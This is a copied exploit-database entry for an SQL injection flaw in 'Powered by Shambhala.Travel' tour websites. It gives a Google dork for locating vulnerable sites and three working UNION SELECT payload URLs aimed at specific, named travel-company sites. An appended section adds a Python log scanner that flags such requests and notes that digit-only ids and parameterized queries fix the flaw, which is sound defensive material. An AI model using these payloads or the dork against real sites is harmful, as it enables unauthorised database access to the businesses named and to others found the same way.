Powered by Shambhala.Travel - SQL Injection vulnerability

CVE: (none listed)
Category: CWE-89
Price: $500
Severity: Critical
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2020-10-22
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100141

Below is a copy:

Powered by Shambhala.Travel - SQL Injection vulnerability
*********************************************************
#Exploit Title: Powered by Shambhala.Travel - SQL Injection vulnerability
#Date: 2020-10-21
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by Shambhala.Travel"
#Category: webapps
#Tested On: Windows 10, Firefox
 
Proof of Concept:
Search Google dork: "Powered by Shambhala.Travel"

Demo :
https://www.longtailboatphiphi.com/tours-detail.php?id=-70%27%20UNION%20SELECT%201,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--+

https://www.triptophuket.com/tour_detail.php?id=-57%20UNION%20SELECT%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56--

https://www.tmttravelphuket.com/tour.php?id=-4%27%20UNION%20SELECT%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--+

********************************************************* 
#Discovered by: Behrouz Mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************
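
Detection example (added here; not part of the original advisory or the vendor's code): a scan of web-server access logs for requests whose id parameter carries the UNION SELECT shape shown in the demo URLs above. The log lines, client addresses and the assumption that legitimate tour ids are plain positive integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (documentation IP ranges, shortened payloads).
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Oct/2020:10:01:02 +0000] "GET /tours-detail.php?id=70 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [22/Oct/2020:10:01:09 +0000] "GET /tours-detail.php?id=-70%27%20UNION%20SELECT%201,2,VERSION(),4--+ HTTP/1.1" 200 4980',
    '198.51.100.9 - - [22/Oct/2020:10:01:15 +0000] "GET /tour_detail.php?id=-57%20UNION%20SELECT%201,2,3,4,5,version(),7-- HTTP/1.1" 200 4711',
    '203.0.113.4 - - [22/Oct/2020:10:02:00 +0000] "GET /tour_detail.php?id=57&lang=en HTTP/1.1" 200 6001',
    '203.0.113.4 - - [22/Oct/2020:10:02:05 +0000] "GET /tour_detail.php?id=abc HTTP/1.1" 404 312',
]

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# UNION [ALL] SELECT after URL decoding, any letter case.
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)


def classify_id(value):
    """Classify one decoded id value (assumption: valid ids are digits only)."""
    if re.fullmatch(r"\d+", value):
        return "ok"
    if UNION_SELECT.search(value):
        return "union-select"
    return "non-numeric"


def scan(lines):
    """Return (client, path, verdict) for every request with a suspicious id."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line we understand
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qs percent-decodes, so %27 and %20 are matched as ' and space.
        for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((client, parts.path, verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

The same digits-only check, applied in the application before the id reaches the query (together with a parameterized statement), is what closes the hole; the log scan only shows who has already probed it.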
